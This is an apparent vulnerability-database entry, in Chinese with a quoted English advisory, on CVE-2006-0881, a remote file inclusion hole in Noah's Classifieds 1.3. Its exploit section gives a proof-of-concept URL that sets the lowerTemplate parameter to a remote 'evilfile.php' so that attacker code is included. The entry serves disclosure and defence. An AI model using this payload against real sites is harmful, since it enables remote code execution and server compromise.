Noah's Classifieds ‘gorum/gorumlib.php’PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109790 漏洞类型 输入验证
发布时间 2006-02-22 更新时间 2006-02-24
CVE编号 CVE-2006-0881 CNNVD-ID CNNVD-200602-374
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27262
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-374
|漏洞详情
Noah'sClassifieds1.3的gorum/gorumlib.php中存在多个PHP远程文件包含漏洞。在启用了register_globals的情况下,远程攻击者可以借助(1)upperTemplate和(2)lowerTemplate参数包含任意PHP文件,如使用指向index.php的lowerTemplate参数所演示的那样。
|漏洞EXP
source: http://www.securityfocus.com/bid/16780/info

Noah's Classifieds is prone to a remote file-include vulnerability. 

An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. 

Version 1.3.0 is vulnerable; other versions may also be affected.

http://www.example.com/classifieds/index.php?lowerTemplate=http://www.example.com/evilfile.php
|参考资料

来源:BID
名称:16780
链接:http://www.securityfocus.com/bid/16780
来源:BUGTRAQ
名称:20060222[KAPDA::#29]Noah'sclassifiedsmultiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/425783/100/0/threaded
来源:MISC
链接:http://www.kapda.ir/advisory-268.html
来源:VUPEN
名称:ADV-2006-0703
链接:http://www.frsirt.com/english/advisories/2006/0703
来源:XF
名称:noahs-gorumlib-file-include(24899)
链接:http://xforce.iss.net/xforce/xfdb/24899
来源:SECTRACK
名称:1015667
链接:http://securitytracker.com/id?1015667